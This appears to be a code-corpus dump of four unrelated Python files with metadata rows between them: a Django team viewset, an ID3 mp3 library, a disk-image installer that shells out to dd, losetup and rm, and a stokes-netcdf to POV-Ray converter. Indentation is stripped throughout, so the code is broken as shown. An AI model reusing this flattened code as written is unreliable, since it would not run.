regions = self.request.query_params.getlist('regions[]')
available_positions = self.request.query_params.getlist('available_positions[]')
interests = self.request.query_params.getlist('interests[]')
languages = self.request.query_params.getlist('languages[]')
if keywords:
queryset = queryset.filter(name__icontains=keywords)
if regions:
queryset = queryset.filter(regions__in=Region.objects.filter(pk__in=regions))
if available_positions:
queryset = queryset.filter(available_positions__in=Position.objects.filter(pk__in=available_positions))
if interests:
queryset = queryset.filter(interests__in=Interest.objects.filter(pk__in=interests))
if languages:
queryset = queryset.filter(languages__in=Language.objects.filter(pk__in=languages))
return queryset.order_by('-search_score', '-updated', )
def get_queryset(self):
queryset = super().get_queryset()
queryset = self.setup_eager_loading(queryset)
search = self.request.query_params.get('search')
if search:
queryset = self.get_queryset_for_search(queryset)
return queryset
def create(self, request, *args, **kwargs):
data = request.data
# Validate with the flat serializer
serializer = FlatTeamSerializer(data=data, context={'request': request})
serializer.is_valid(raise_exception=True)
new_team = self.perform_create(serializer)
try:
player_position = Position.objects.get(pk=request.data.get('player_position'))
except Position.DoesNotExist:
player_position = None
TeamMember.objects.create(team=new_team, player=request.user.player, position=player_position)
headers = self.get_success_headers(serializer.data)
# Return a nested serializer
full_team = TeamSerializer(instance=new_team, context={'request': request})
return Response(full_team.data, status=status.HTTP_201_CREATED, headers=headers)
def perform_create(self, serializer):
return serializer.save(creator=self.request.user.player, captain=self.request.user.player)
def update(self, request, *args, **kwargs):
partial = kwargs.pop('partial', False)
instance = self.get_object()
serializer_class = self.get_serializer_class()
serializer = serializer_class(instance, data=request.data, partial=partial, context={'request': request})
serializer.is_valid(raise_exception=True)
updated_team = self.perform_update(serializer)
try:
# Try to update the requesting user's position within the team
player_position = Position.objects.get(pk=request.data.get('player_position'))
team_member = TeamMember.objects.get(team=updated_team, player=request.user.player)
if player_position != team_member.position:
team_member.position = player_position
team_member.save()
except (Position.DoesNotExist, TeamMember.DoesNotExist):
pass
full_team = TeamSerializer(instance=updated_team, context={'request': request})
return Response(full_team.data)
def perform_update(self, serializer):
return serializer.save()
@detail_route(permission_classes=(permissions.IsAuthenticated,), methods=('GET',))
def memberships(self, request, pk=None):
team = self.get_object()
serializer = PlayerMembershipSerializer(
team.teammember_set.all(), many=True, context={'request': request}
)
return Response(serializer.data, status=status.HTTP_200_OK)
|
apache-2.0
| 5,376,675,978,768,944,000
| 42.993056
| 119
| 0.64562
| false
| 4.496097
| false
| false
| false
|
eduble/SimpleFilesystems
|
taggerfs/id3library.py
|
1
|
2766
|
#!/usr/bin/env python
"""
This module implements a management library for your
collection of ID3-tagged mp3 files.
"""
import os
from os.path import join
from mutagen.easyid3 import EasyID3
class ID3Library:
"""Library of ID3-tagged mp3 files."""
def __init__(self):
"""Constructor."""
self._data = {}
def getTag(self, mp3file):
try:
tag = EasyID3(mp3file)
except: # no ID3 tag
tag = EasyID3()
return tag
def getTagElement(self, tag, elem):
"""Sub-routine to get one element of an ID3 tag (i.e. artist, album, ...)."""
value = None
if elem in tag:
value = tag[elem][0].encode('utf8').strip()
if value == '':
value = None
return value
def registerMP3File(self, path):
"""Registers the ID3 tag of a given mp3 file into the library."""
tag = self.getTag(path)
artist = self.getTagElement(tag,'artist')
album = self.getTagElement(tag,'album')
if artist == None:
artist = 'UnknownArtist'
if album == None:
album = 'UnknownAlbum'
if artist not in self._data:
self._data[artist] = {}
allAlbumsOfArtist = self._data[artist]
if album not in allAlbumsOfArtist:
allAlbumsOfArtist[album] = set({})
allTracksOfAlbum = allAlbumsOfArtist[album]
allTracksOfAlbum.add(path)
def registerMP3FilesFromDir(self, d):
"""Registers all files in a given directory (including files in sub-directories)."""
for dirname, dirnames, filenames in os.walk(d):
for filename in filenames:
if filename.endswith('.mp3'):
print 'adding file:', filename
path = join(dirname, filename)
self.registerMP3File(path)
def getArtists(self):
"""Outputs the list of artists the library knows about."""
return self._data.keys()
def getAlbums(self, artist):
"""Outputs the list of albums the library knows about for a given artist."""
return self._data[artist].keys()
def getFiles(self, artist, album):
"""Outputs the list of files the library knows about for a given album."""
return self._data[artist][album]
def registerArtist(self, artist):
"""Registers an artist into the library."""
self._data[artist] = {}
def registerAlbum(self, artist, album):
"""Registers an album into the library."""
self._data[artist][album] = set({})
def update(self, fullpath, old_artist, old_album,
new_artist, new_album):
"""
Updates the data (artist & album) about a given song.
In-memory and in-file (i.e. the ID3 tag) data will both be updated.
"""
# update current hierarchy
self._data[new_artist][new_album].add(fullpath)
self._data[old_artist][old_album].remove(fullpath)
# update ID3 tag
tag = self.getTag(fullpath)
tag['artist'] = new_artist
tag['album'] = new_album
tag.save(fullpath)
|
lgpl-3.0
| -6,175,146,277,138,132,000
| 28.741935
| 86
| 0.665944
| false
| 3.281139
| false
| false
| false
|
HugoMMRabson/fonsa
|
src/my/installer/__init__.py
|
1
|
14952
|
#!/usr/bin/python3
"""
my.installer.__init__
# TESTING "PHASE ONE", ONE LINE AT A TIME...
import os
from willywonka_installer import *
from my.installer import *
args = Object()
args.skipalltools = True
args.platform = 'RaspberryPi3'
args.debugip = '192.168.251.112'
args.usegzipo = True
args.outfile = '%s/testout.img' % WONKADIR
from my.v2and3 import connect_to_pydev_remote_debugger
connect_to_pydev_remote_debugger(args.debugip)
our_working_image = '%s/tmp/tmpfs/%s.wkg' % (WONKADIR, os.path.basename(args.outfile))
our_pristine_image = '%s/%s.pstn' % (WONKADIR, os.path.basename(args.outfile)) # TODO: %s/tmp/%s
our_golden_tarball = '%s/old/20180000_golden/%s.golden.tar.lzo' % (WONKADIR, args.platform)
for i in (our_working_image, our_pristine_image, our_golden_tarball):
os.system('mkdir -p %s' % os.path.dirname(i))
os.system('rm -f "%s"' % args.outfile)
if not os.path.exists(our_pristine_image):
obtain_decompressed_pristine_image(our_pristine_image, args.platform)
os.system('rm -f %s' % our_golden_tarball) # TEST PORPOISES
if not os.path.exists(our_golden_tarball) or 0 != os.system('find %s -mtime -%d 2>/dev/null' % (our_golden_tarball, DAYS_BEFORE_FORCING_REBUILD)):
from_a_pristine_image_generate_a_golden_tarball(pristine_image=our_pristine_image,
save_golden_tarball_here=our_golden_tarball,
skipalltools=args.skipalltools)
build_folder = '%s/mnt/src.%s' % (WONKADIR, args.platform)
print('Extracting golden tarball to our build folder => %s' % build_folder)
os.system('mkdir -p %s' % build_folder)
system_or_die('pv %s | lzop -d -c | tar -x -C %s' % (our_golden_tarball, build_folder))
if not args.skipalltools:
i_shall_call_willywonka_installer_phase_two(build_folder)
migrate_all_data_from_folder_to_resized_image(pristine_image=our_pristine_image,
src_folder=build_folder,
output_img_name=our_working_image,
use_gzip=args.usegzip,
silent=False)
"""
import datetime
import os
import sys
from my.globals.consts import RC_LOCAL_FNAME, FONSA_LOCKFILENAME, HOSTNAME_FNAME, PRODUCTION_MODEL, WONKADIR
from my.globals.exceptions import CannotFindSpareLoopdevError, WhatDoIDoWithThisPartitionError, ExternalCallBinaryError
from my.installer.rscripts import MAXIMUM_LIKELY_BOOT_PARTITION_SIZE_IN_MB, APT_GET_OPTIONALPKGS, APT_GET_PACKAGES, PIP3PACKAGES
from my.miscellany import call_binary, system_or_die, generate_temporary_filename, chroot_this, sleep
def dissociate_loopdevs_en_masse(attempts=3):
for i in range(0, 32):
os.system("umount /dev/loop%d 2> /dev/null " % i)
free_up_loopdev('/dev/loop%d' % i, attempts=attempts, silent=True)
def generate_128MB_randomized_data_file(random_data_fname):
os.system('''
fname=%s
dd if=/dev/urandom of=$fname bs=1024k count=8 2>/dev/null
cat $fname $fname $fname $fname > $fname.big 2>/dev/null
sync
cat $fname.big $fname.big $fname.big $fname.big > $fname 2>/dev/null
sync
rm -f $fname.big
''' % random_data_fname)
def download_pristine_copy_of_the_OS(downloaded_pristine_image_xz):
# print('''Beginning step 0; mtpt="%s"; goldenf="%s"; our_working_image="%s"''' % (mtpt, goldenf, our_working_image))
if not os.path.exists(downloaded_pristine_image_xz):
raise SystemError('%s not found; NEFARIOUS PORPOISES; re-enable downloader, please.' % downloaded_pristine_image_xz)
# rm -f $destfile
# echo "*** Downloading pristine OS ***"
# mount | grep "$mtpt" && echo "WARNING --- mountpoint is still mounted (start of part 0)" || true
# losetup $loopdev 2>/dev/null && die "Loop device is loopy. Why? (start of part 0)" || true
# # Have we downloaded and compressed a pristine disk image yet? (By 'pristine,' I mean 'freshly
# # downloaded from the RPi3/ODroid/NanoPi website.') If we haven't, let's do that now.
# if [ ! -e "$DOWNLOADED_PRISTINE_IMAGE.xz" ] ; then
# echo "$DOWNLOADED_PRISTINE_IMAGE.xz not found; NEFARIOUS PORPOISES; re-enable please_download_pristine_image() eventually."
# exit 111
# please_download_pristine_image $DOWNLOADED_PRISTINE_IMAGE $pristine_url
# rm -f $GOLDENF.xz
# else
# echo "$DOWNLOADED_PRISTINE_IMAGE.xz exists. Good."
# fi
# losetup $loopdev 2>/dev/null && die "Loop device is loopy. Why? (end of part 0)" || true
# fi
#
def free_up_loopdev(sparedev, attempts=3, silent=True):
if not silent:
print("Freeing up %s" % sparedev)
os.system('umount %s 2> /dev/null' % sparedev)
while attempts >= 0 and 0 == os.system('losetup | grep "%s " >/dev/null 2>/dev/null' % sparedev):
attempts -= 1
if not silent:
print('Waiting for %s to become free...' % sparedev)
os.system('umount %s 2> /dev/null' % sparedev)
os.system('sync;sync;sync; losetup -d %s 2>/dev/null; sync;sync;sync' % sparedev)
sleep(.5)
if 0 == os.system('losetup | grep %s >/dev/null 2>/dev/null' % sparedev):
print("Warning - failed to dissociated %s" % sparedev)
elif not silent:
print('%s is free. Good.' % sparedev)
def get_a_spare_loopdev():
spare_loopdev = None
for i in range(0, 32):
a_loopdev = '/dev/loop%d' % i
if 0 != os.system('losetup %s > /dev/null 2> /dev/null' % a_loopdev):
spare_loopdev = a_loopdev
break
if spare_loopdev is None:
CannotFindSpareLoopdevError('Unable to find a spare /dev/loop entry')
return spare_loopdev
def get_total_RAM_in_MB():
retcode, textout = call_binary(['free'])
if 0 != retcode:
raise ExternalCallBinaryError("Failed to get total RAM in MB")
return int(textout.split('\n')[1].split(':')[1].strip(' ').split(' ')[0])
# def is_this_my_first_run():
# return False if os.path.exists(HOSTAPDCONF_FNAME) else True
def get_all_partitions_lines_from_fdisk(imagef):
retcode, textout = call_binary(['fdisk', '-l', imagef])
if 0 != retcode:
raise ExternalCallBinaryError("Failed to get fdisk info")
fdisk_output = textout.split('\n')
return [r for r in fdisk_output if r.split(' ')[0].find('/') == 0]
def get_sector_size(imagef):
retcode, textout = call_binary(['fdisk', '-l', imagef])
if 0 != retcode:
raise ExternalCallBinaryError("Failed to run fdisk -l")
fdisk_output = textout.split('\n')
return int([r for r in fdisk_output if r.find(' * ') >= 0 and r.find(':') >= 0][0].split('=')[1].strip(' ').split(' ')[0])
def calculate_sectorsize_and_partition_size_and_stuff(imagef):
'''
diskinfo.sectorsize size of each sector (usually 512 bytes)
diskinfo.noof_parts how many partitions are there?
diskinfo.root_partno which partition# is root?
diskinfo.boot_partno which partition# is boot?
diskinfo.usr_partno which partition# is usr?
diskinfo.partinfo info on specific partitions
diskinfo.partitions[1].start_sector
diskinfo.partitions[1].start_in_bytes
diskinfo.partitions[1].end_sector
diskinfo.partitions[1].size_in_bytes
diskinfo.partitions[1].format_hexcode
diskinfo.partitions[1].format_name
...etc...
'''
diskinfo = Object()
all_lines = get_all_partitions_lines_from_fdisk(imagef)
diskinfo.sectorsize = get_sector_size(imagef)
diskinfo.boot_partno = None
diskinfo.root_partno = None
diskinfo.usr_partno = None
diskinfo.noof_parts = len(all_lines)
diskinfo.partitions = [None, None, None, None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None, None, None, None, None, None, None]
for this_line in all_lines:
# <diskimage fname><partno> (*?) <start> <end> <sectors> <size in text> <format_hexcode> <format_name>
this_line = this_line.replace(' * ', ' ').replace(' ', ' '
).replace(' ', ' '
).replace(' ',
' ').replace(' ', ' '
).replace(' ', ' '
).replace(' ', ' '
).replace(' ', ' ')
fname_and_partno, start_sector, end_sector, noof_sectors, size_str, format_hexcode = this_line.split(' ')[:6]
format_name = ''.join([r + ' ' for r in this_line.split(' ')[7:]])
partno = int(fname_and_partno.split(imagef)[1])
diskinfo.partitions[partno] = Object()
diskinfo.partitions[partno].start_sector = int(start_sector)
diskinfo.partitions[partno].end_sector = int(end_sector)
diskinfo.partitions[partno].noof_sectors = int(noof_sectors)
diskinfo.partitions[partno].size_str = size_str
diskinfo.partitions[partno].format_hexcode = format_hexcode
diskinfo.partitions[partno].format_name = format_name
diskinfo.partitions[partno].start_in_bytes = diskinfo.partitions[partno].start_sector * diskinfo.sectorsize
diskinfo.partitions[partno].size_in_bytes = diskinfo.partitions[partno].noof_sectors * diskinfo.sectorsize
diskinfo.partitions[partno].size_in_MBs = diskinfo.partitions[partno].size_in_bytes / 1024 / 1024
if diskinfo.root_partno is None and diskinfo.boot_partno is None\
and diskinfo.partitions[partno].size_in_MBs <= MAXIMUM_LIKELY_BOOT_PARTITION_SIZE_IN_MB:
# print('Partition #%d is probably /boot' % partno)
diskinfo.boot_partno = partno
elif diskinfo.root_partno is None:
# print('Partition #%d is probably root' % partno)
diskinfo.root_partno = partno
elif diskinfo.usr_partno is None:
# print('Partition #%d is probably /usr' % partno)
diskinfo.usr_partno = partno
else:
raise WhatDoIDoWithThisPartitionError("I do not know what to do with partition #%d of %s; \
surely we have found all the partitions already; what is this sorcery?" % (partno, imagef))
return diskinfo
class Object(object):
pass
# def DOWNLOADED_PRISTINE_IMAGE(imagefile, storage_folder):
# if 0 != os.system('''
# local imagefile=%s our_mtpt=$WONKADIR/tmp/our_mtpt.$RANDOM$RANDOM storage_folder%s
# mkdir -p $our_mtpt
# mount_the_disk_image $imagefile $our_mtpt
# umount $our_mtpt/{dev/pts,dev,proc,tmp,var,sys,proc} 2> /dev/null || true
# cd $our_mtpt
# echo "Making a copy of the filesystem from the original image file --- from $our_mtpt to $storage_folder"
# mkdir -p $storage_folder
# cp -af * $storage_folder/
# cd /
# unmount_disk_image $our_mtpt
# rmdir $our_mtpt || true''' % (imagefile, storage_folder)):
# raise SystemError("Failed to download pristine image")
def copy_first_few_MB_of_existing_imagefile_and_add_zeros_to_pad_it_out(imagefile, truncatedimgfile, finalsizeofourimage):
print("Creating truncated copy of existing imagefile")
os.system('dd if=%s of=%s bs=1024k count=%d' % (imagefile, truncatedimgfile, finalsizeofourimage))
os.system('''
truncatedimgfile=%s
finalsizeofourimage=%d
echo -en "Adding zeroes to end of pristine file, to pad it out"
while [ "$(($(ls -l $truncatedimgfile | tr -s '\t' ' ' | cut -d' ' -f5)/1024/1024))" -lt "$finalsizeofourimage" ] ; do
echo -en "."
dd if=/dev/zero bs=1024 count=8192 >> $truncatedimgfile 2> /dev/null # Don't use conv=sparse, please. Don't.
[ "$?" -eq "0" ] || echo "Failed to finish resizing image. Did we run out of disk space?"
done
echo "...Padded. Yay."
''' % (truncatedimgfile, finalsizeofourimage))
def please_download_pristine_image(downloaded_pristine_image, pristine_url):
raise SystemError('not written yet')
'''
local DOWNLOADED_PRISTINE_IMAGE="$1" pristine_url="$2"
rm -f "$DOWNLOADED_PRISTINE_IMAGE"
echo "Downloading pristine image"
if echo "$pristine_url" | grep -F .tar.xz >/dev/null ; then
suffix=tar.xz
die "I have no idea how to handle .tar.xz endings. This may be an eMMC thing. Help!"
elif echo "$pristine_url" | grep -F .xz >/dev/null ; then
suffix=xz
elif echo "$pristine_url" | grep -F .gz >/dev/null ; then
suffix=gz
elif echo "$pristine_url" | grep -F .7z >/dev/null ; then
suffix=7z
elif echo "$pristine_url" | grep -F .zip >/dev/null ; then
suffix=zip
else
die "Failed to handle type of compression that $DOWNLOADED_PRISTINE_IMAGE.* uses."
fi
rm -f "$DOWNLOADED_PRISTINE_IMAGE".$suffix.tmp
die "wget $pristine_url -O "$DOWNLOADED_PRISTINE_IMAGE".$suffix.tmp"
mv -f "$DOWNLOADED_PRISTINE_IMAGE".$suffix.tmp "$DOWNLOADED_PRISTINE_IMAGE".$suffix
echo "Unzipping it"
if [ "$suffix" = "xz" ] ; then
xz -d "$DOWNLOADED_PRISTINE_IMAGE".$suffix
elif [ "$suffix" = "gz" ] ; then
gunzip "$DOWNLOADED_PRISTINE_IMAGE".$suffix
elif [ "$suffix" = "7z" ] ; then
mkdir -p $(dirname "$DOWNLOADED_PRISTINE_IMAGE")/aaaaa
7z x -o$(dirname "$DOWNLOADED_PRISTINE_IMAGE")/aaaaa "$DOWNLOADED_PRISTINE_IMAGE".7z
mv $(dirname "$DOWNLOADED_PRISTINE_IMAGE")/aaaaa/*.* "$DOWNLOADED_PRISTINE_IMAGE"
rmdir $(dirname "$DOWNLOADED_PRISTINE_IMAGE")/aaaaa/*
rmdir $(dirname "$DOWNLOADED_PRISTINE_IMAGE")/aaaaa || true
elif [ "$suffix" = "zip" ] ; then
mkdir -p $(dirname "$DOWNLOADED_PRISTINE_IMAGE")/aaaaa
unzip "$DOWNLOADED_PRISTINE_IMAGE".zip -d $(dirname "$DOWNLOADED_PRISTINE_IMAGE")/aaaaa
mv $(dirname "$DOWNLOADED_PRISTINE_IMAGE")/aaaaa/*.* "$DOWNLOADED_PRISTINE_IMAGE"
rmdir $(dirname "$DOWNLOADED_PRISTINE_IMAGE")/aaaaa/*
rmdir $(dirname "$DOWNLOADED_PRISTINE_IMAGE")/aaaaa || true
else
die "Failed to handle type of compression that $DOWNLOADED_PRISTINE_IMAGE.* uses."
fi
[ -e "$DOWNLOADED_PRISTINE_IMAGE" ] || die "Unable to decompress $DOWNLOADED_PRISTINE_IMAGE image"
echo "Compressing it (again)"
pv -p $DOWNLOADED_PRISTINE_IMAGE | xz -5e > $DOWNLOADED_PRISTINE_IMAGE.xz
rm -f $DOWNLOADED_PRISTINE_IMAGE $DOWNLOADED_PRISTINE_IMAGE.$suffix
echo "Finished compressing it. We now have a (usable) pristine disk image."
'''
# ------------------------------------------------------------------------------------------------------------------------------------------------------------
if __name__ == "__main__":
raise SystemExit('Do not run me!')
|
gpl-3.0
| -8,482,496,389,659,124,000
| 47.07717
| 158
| 0.617442
| false
| 3.209272
| false
| false
| false
|
kichiki/stokes
|
python/stnc2pov.py
|
1
|
25797
|
# stokes-netcdf to pov converter
# Copyright (C) 2006-2008 Kengo Ichiki <kichiki@users.sourceforge.net>
# $Id: stnc2pov.py,v 1.9 2008/06/03 02:57:43 kichiki Exp $
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
import sys
#sys.path.append('/somewhere/ryuon/stokes/python')
import stokes
def write_T_Balls(f, n):
f.write('#declare T_Ball_%d = texture {\n'%(n))
f.write(' pigment {\n'\
' image_map {\n'\
' jpeg \"textures/%d.jpg\"\n'\
' map_type 1\n'\
' interpolate 2\n'\
' }\n'\
' rotate <0, 270, 0>\n'\
' }\n'%(n))
f.write(' finish {\n'\
' phong 0.9\n'\
' ambient 0.5\n'\
' reflection 0.2\n'\
' }\n'\
'}\n')
def write_T_Particle(f):
f.write('#declare T_Particle = texture {\n'\
' pigment { color White }\n'\
' //finish { ambient 0.2 diffuse 0 reflection 0.6 }\n'\
' finish {\n'\
' ambient .1\n'\
' diffuse .1\n'\
' specular 1\n'\
' roughness .001\n'\
' metallic\n'\
' reflection {\n'\
' .75\n'\
' metallic\n'\
' }\n'\
' }\n'\
'}\n')
def write_T_Particles_with_Bonds(f, color):
f.write('#declare T_Particles_with_Bonds = texture {\n'\
' pigment { color %s }\n'\
' finish {\n'\
' ambient .1\n'\
' diffuse .4\n'\
' reflection {\n'\
' .75\n'\
' metallic\n'\
' }\n'\
' specular 1\n'\
' }\n'\
'}\n'%(color))
def write_M_RYUON(f):
# M_RYUON
f.write('#declare M_RYUON = material {\n'\
' texture {\n'\
' pigment {\n'\
' color <0.4, 0.5, 1.0>\n'\
' filter 1\n'\
' }\n'\
' finish {\n'\
' ambient 0\n'\
' diffuse 0\n'\
' reflection .25\n'\
' specular 1\n'\
' roughness .001\n'\
' }\n'\
' } // end of texture\n'\
' interior { ior 1.33 }\n'
'}\n')
def write_T_CHECKER(f):
f.write('#declare T_CHECKER = texture {\n'\
' pigment{\n'\
' checker\n'\
' color <0.4, 0.5, 1.0>\n'\
' color White\n'\
' }\n'\
' scale 0.01\n'\
' finish{\n'\
' phong 0.9\n'\
' metallic\n'\
' }\n'\
'}\n')
def bounding_box (np, x):
(cx,cy,cz) = (0.0, 0.0, 0.0)
for i in range(np):
xx = x[i*3]
yy = x[i*3+1]
zz = x[i*3+2]
cx = cx + xx
cy = cy + yy
cz = cz + zz
if i == 0:
lx0 = lx1 = xx
ly0 = ly1 = yy
lz0 = lz1 = zz
else:
if lx0 > xx:
lx0 = xx
if lx1 < xx:
lx1 = xx
if ly0 > yy:
ly0 = yy
if ly1 < yy:
ly1 = yy
if lz0 > zz:
lz0 = zz
if lz1 < zz:
lz1 = zz
cx = cx / float(np)
cy = cy / float(np)
cz = cz / float(np)
lx = lx1 - lx0
ly = ly1 - ly0
lz = lz1 - lz0
return (cx,cy,cz, lx,ly,lz)
# INPUT
# f : file
# lattice = (lx,ly,lz) in simulation coordinates
# camera = (cx,cy,cz)
# lookat = (lax,lay,laz)
# flag_ball : 0 => checker, 1 => pool balls
# flag_bonds :
# bond_color : '' is accepted (for Red)
def write_pov_header (f, lattice, camera, lookat,
flag_ball=0, flag_bonds=0, bond_color=''):
# note that in POVRAY,
# y is the vertical direction
# z is the depth direction
# scale factor = 1/100 (0.01 radius = 1 in POV)
lx = lattice[0]/100.0
lz = lattice[1]/100.0
ly = lattice[2]/100.0
cx = camera[0]/100.0
cz = camera[1]/100.0
cy = camera[2]/100.0
lax = lookat[0]/100.0
laz = lookat[1]/100.0
lay = lookat[2]/100.0
if flag_bonds == 0:
f.write('#include "colors.inc"\n')
#f.write('#include "woods.inc"\n\n')
# place the ground
f.write('// floor\nplane {\n'\
' y, -0.1\n'\
' texture {\n'\
#' T_Wood6\n'\
#' finish{ ambient 1 }\n'\
' pigment { checker color White, color <.7, .7, .7> }\n'\
' scale .3\n'\
' finish{ ambient .4 }\n'\
' }\n'\
'}\n')
# place the walls
f.write('// back wall\n'\
'plane {\n'\
' z, 1\n'\
' pigment { color rgb <1,1,0.8> }\n'\
' finish{ ambient 0.4 }\n'\
'}\n')
f.write('// ceiling\n'\
'plane {\n'\
' y, 5\n'\
' pigment { color White }\n'\
'}\n')
f.write('// right wall\n'\
'plane {\n'\
' x, 5\n'\
' pigment { color White }\n'\
'}\n')
f.write('// left wall\n'\
'plane {\n'\
' x, -5\n'\
' pigment { color White }\n'\
'}\n')
f.write('// behind wall\n'\
'plane {\n z, -5\n'\
' pigment { color White }\n'\
'}\n\n')
# place the box
f.write('box {\n'\
' <0, 0, 0>, // Near lower left corner\n'\
' <%f, %f, %f> // Far upper right corner\n'\
' pigment { color rgbf <0.9, 0.99, 1, 1> }\n'\
'}\n\n'%(lx, ly, lz))
f.write('camera {\n location <%f, %f, %f>\n'%(cx, cy, cz))
f.write(' look_at <%f, %f, %f>\n}\n\n'%(lax, lay, laz))
f.write('light_source { <2, 4.9, -3> color White}\n\n')
write_T_Particle(f)
else:
f.write('#include "colors.inc"\n')
f.write('background { color White }\n')
f.write('camera {\n location <%f, %f, %f>\n'%(cx, cy, cz))
f.write(' look_at <%f, %f, %f>\n}\n\n'%(lax, lay, laz))
f.write('light_source { <2, 4.9, -3> color White}\n\n')
write_T_Particle(f)
if bond_color == '':
write_T_Particles_with_Bonds(f, 'Red')
else:
write_T_Particles_with_Bonds(f, bond_color)
if flag_ball == 0:
write_M_RYUON (f)
write_T_CHECKER(f)
else:
for i in range(16):
write_T_Balls(f,i)
# INPUT
# f : file
# lattice = (lx,ly,lz) in simulation coordinates
# camera = (cx,cy,cz)
# lookat = (lax,lay,laz)
# flag_ball : 1 => pool balls
# flag_bonds :
# bond_color : '' is accepted (for Red)
def write_pov_header_open (f, lattice, camera, lookat,
flag_ball=0, flag_bonds=0, bond_color=''):
# note that in POVRAY,
# y is the vertical direction
# z is the depth direction
# scale factor = 1/100 (0.01 radius = 1 in POV)
lx = lattice[0]/100.0
lz = lattice[1]/100.0
ly = lattice[2]/100.0
cx = camera[0]/100.0
cz = camera[1]/100.0
cy = camera[2]/100.0
lax = lookat[0]/100.0
laz = lookat[1]/100.0
lay = lookat[2]/100.0
f.write('#include \"colors.inc\"\n')
f.write('#include "woods.inc"\n\n')
if flag_bonds == 0:
# place the walls
f.write('// back wall\n'\
'plane {\n'\
' z, 2\n'\
' pigment { checker color White, color <0.6, 0.8, 1> }\n'\
' scale 0.1\n}\n')
f.write('// behind wall\n'\
'plane {\n'\
' z, -5\n'\
' pigment { color White }\n'\
'}\n\n')
f.write('camera {\n location <%f, %f, %f>\n'%(cx, cy, cz))
f.write(' look_at <%f, %f, %f>\n}\n\n'%(lax, lay, laz))
f.write('light_source { <2, 4.9, -3> color White}\n\n')
write_T_Particle(f)
else:
f.write('#include "colors.inc"\n')
f.write('background { color White }\n')
f.write('camera {\n location <%f, %f, %f>\n'%(cx, cy, cz))
f.write(' look_at <%f, %f, %f>\n}\n\n'%(lax, lay, laz))
f.write('light_source { <2, 4.9, -3> color White}\n\n')
write_T_Particle(f)
if bond_color == '':
write_T_Particles_with_Bonds(f, 'Red')
else:
write_T_Particles_with_Bonds(f, bond_color)
if flag_ball == 0:
write_M_RYUON (f)
write_T_CHECKER(f)
else:
for i in range(15):
write_T_Balls(f,i+1)
def write_pov_particle (f, x, y, z, a):
# note that in POVRAY,
# y is the vertical direction
# z is the depth direction
# scale factor = 1/100 (0.01 radius = 1 in POV)
f.write('sphere {\n')
f.write(' <%f, %f, %f>, %f\n'%(x/100.0, z/100.0, y/100.0, a/100.0))
f.write(' material { M_RYUON }\n}\n')
def write_pov_particle_fixed (f, x, y, z, a):
# note that in POVRAY,
# y is the vertical direction
# z is the depth direction
# scale factor = 1/100 (0.01 radius = 1 in POV)
f.write('sphere {\n')
f.write(' <%f, %f, %f>, %f\n'%(x/100.0, z/100.0, y/100.0, a/100.0))
f.write(' texture { T_Particle }\n}\n')
def write_pov_particles_with_bonds (f, nm, pos, a, br):
# note that in POVRAY,
# y is the vertical direction
# z is the depth direction
# scale factor = 1/100 (0.01 radius = 1 in POV)
# all objects are merged
f.write('merge {\n')
# sheres
for j in range(nm):
if a == []: rad = 1.0
else: rad = a[j]
x = pos[j*3]
y = pos[j*3+1]
z = pos[j*3+2]
f.write(' sphere {\n')
f.write(' <%f, %f, %f>, %f\n'\
%(x/100.0, z/100.0, y/100.0, rad/100.0))
f.write(' }\n')
# bonds
for j in range(nm-1):
if a == []: rad = 1.0
else: rad = a[j]
if br > 0.0:
rad = br / 100.0
else:
# set cylinder's radius the half
rad = 0.5 * rad / 100.0
x0 = pos[j*3 ] / 100.0
y0 = pos[j*3+1] / 100.0
z0 = pos[j*3+2] / 100.0
x1 = pos[(j+1)*3 ] / 100.0
y1 = pos[(j+1)*3+1] / 100.0
z1 = pos[(j+1)*3+2] / 100.0
f.write(' cylinder {\n')
f.write(' <%f, %f, %f>, <%f, %f, %f>, %f\n'\
%(x0, z0, y0, x1, z1, y1, rad))
f.write(' }\n')
f.write(' texture { T_Particles_with_Bonds }\n')
f.write('}\n')
# make transform matrix (3x3) by quaternion
def Q2M (q1,q2,q3,q4):
m = []
# parity change
q4 *= -1.0
m.append(2.0*(q1*q1 + q4*q4 - .5))
m.append(2.0*(q1*q2 + q3*q4))
m.append(2.0*(q1*q3 - q2*q4))
m.append(2.0*(q1*q2 - q3*q4))
m.append(2.0*(q2*q2 + q4*q4 - .5))
m.append(2.0*(q2*q3 + q1*q4))
m.append(2.0*(q1*q3 + q2*q4))
m.append(2.0*(q2*q3 - q1*q4))
m.append(2.0*(q3*q3 + q4*q4 - .5))
# note that in POVRAY,
# y is the vertical direction
# z is the depth direction
t = [1.0, 0.0, 0.0,\
0.0, 0.0, 1.0,\
0.0, 1.0, 0.0]
x = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
y = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
for i in range(3):
for j in range(3):
for k in range(3):
x[i*3+j] += t[i*3+k] * m[k*3+j]
for i in range(3):
for j in range(3):
for k in range(3):
y[i*3+j] += x[i*3+k] * t[k*3+j]
# therefore, Y = T . M . T
return y
def write_pov_particle_Q (f, x, y, z, a, q):
# note that in POVRAY,
# y is the vertical direction
# z is the depth direction
# scale factor = 1/100 (0.01 radius = 1 in POV)
m = Q2M (q[0], q[1], q[2], q[3])
f.write('sphere {\n')
f.write(' <0, 0, 0>, %f\n'%(a/100.0))
f.write(' texture { T_CHECKER }\n')
f.write(' transform {\n')
f.write(' matrix <%f, %f, %f,\n'%(m[0], m[3], m[6]))
f.write(' %f, %f, %f,\n'%(m[1], m[4], m[7]))
f.write(' %f, %f, %f,\n'%(m[2], m[5], m[8]))
f.write(' %f, %f, %f> }\n'%(x/100.0, z/100.0, y/100.0))
f.write('}\n')
def write_pov_particle_Balls_Q (f, x, y, z, a, q, i):
n = i%15 + 1
# note that in POVRAY,
# y is the vertical direction
# z is the depth direction
# scale factor = 1/100 (0.01 radius = 1 in POV)
m = Q2M (q[0], q[1], q[2], q[3])
f.write('sphere {\n')
f.write(' <0, 0, 0>, %f\n'%(a/100.0))
